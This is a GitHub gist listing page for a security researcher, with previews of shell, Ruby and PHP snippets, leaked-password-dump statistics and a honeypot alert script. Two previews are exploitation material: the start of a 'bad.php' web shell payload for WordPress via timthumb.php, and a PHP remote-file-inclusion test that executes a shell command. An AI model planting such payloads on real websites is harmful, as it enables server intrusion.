Felipe Molina felmoltor

@felmoltor
felmoltor / gist:617feed1e12e5c53aa5d
Last active August 29, 2015 14:05
unificarangos.sh
#!/bin/bash
if [[ ! -f $1 || $# -ne 2 ]];then
echo "Usage: $0 <file> <resultfile>"
else
resultfile=$2
echo -n "" > $resultfile
for line in `cat $1`; do
line=$(echo $line | tr -d ' ')
if [[ $(echo $line | grep "-"| wc -l) > 0 ]];then
####################################################
# List all the files recursively under a directory #
####################################################
def ls_r_files(path)
path.gsub!(/\/+$/,"")
if path[-2,2] != "/." and path[-2,3] != "/.."
if File.directory?(path)
fentries = []
entries = Dir.entries(path)
@felmoltor
felmoltor / gist:092b76182cc58a331b1f
Created September 10, 2014 18:10
Top domains in 5M gmail dump
Top domains leaked in the 5M password dump of Gmail accounts. Mainly gmail.com and yandex.ru, plus other similar domains that look like a bug in the phishing or keylogger program:
4800946 gmail.com
123213 yandex.ru
608 gmail.com777
338 gmail.com.vn
256 gmail.com.br
238 gmail.com.au
188 gmail.com7777
174 gmail.com.com
@felmoltor
felmoltor / Gmail 5M accounts dumped analysis
Created September 16, 2014 16:23
Gmail 5M accounts dumped. Statistical Analysis
--------------------
---- 1º Million ----
--------------------
Analyzing a file with user, passwords and separator ':'
Loading the whole dump file. Be patient...
Spliting the dump information...
Analycing the password frecuency...
Analycing the domains frecuency...
Analycing passwords complexity...
@felmoltor
felmoltor / Gmail 5M accounts dumped analysis (2)
Created September 17, 2014 11:29
Gmail 5M accounts dumped analysis (2)
--------------
- 1º Million -
--------------
________________ __________ ____ _______
\_ _____/ _ \\______ \ ___ _/_ | \ _ \
| __)/ /_\ \| ___/ \ \/ /| | / /_\ \
| | / | \ | \ / | | \ \_/ \
\__ | \____|__ /____| \_/ |___| /\ \_____ /
\/ \/ \/ \/
@felmoltor
felmoltor / keybase.md
Last active August 29, 2015 14:13
keybase.md

Keybase proof

I hereby claim:

  • I am felmoltor on github.
  • I am felmoltor (https://keybase.io/felmoltor) on keybase.
  • I have a public key whose fingerprint is 1485 9C64 36C5 CA4F 236B C04A 990A 3B4D BB7C FB45

To claim this, I am signing this object:

@felmoltor
felmoltor / checkbinaries.sh
Last active August 29, 2015 14:13
Kippo - new malware dropped alert
#!/bin/bash
# Author: Felipe Molina (@felmoltor)
# Date: January 2015
# Purpose: This script checks for new binaries captured by kippo and sends an email when an attacker drops a new one
#############################
LASTLS='lastls.txt'
CURRENTLS='currentls.txt'
@felmoltor
felmoltor / bad.php
Created April 12, 2015 10:07
Payload for wordpress. Exploiting timthumb.php
<?php
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
@felmoltor
felmoltor / rfi
Last active August 29, 2015 14:20
rfi
<?php
// echo "Testing RFI success!";
$e = '';
exec("touch ./bbbbbbbb.txt",$e);
?>
@felmoltor
felmoltor / close.firewall.sh
Last active August 29, 2015 14:21
Open Dev environment to SSH authenticated user
#!/bin/bash
# Close the remaining firewall rules opened for users that are no longer connected by SSH
# It deletes the iptables rules except the ssh (port 22) and all the local connections
# Save this script and execute it as root with a crontab every 5 minutes.
# Example output of iptables -L -n:
# ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:80
# ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:443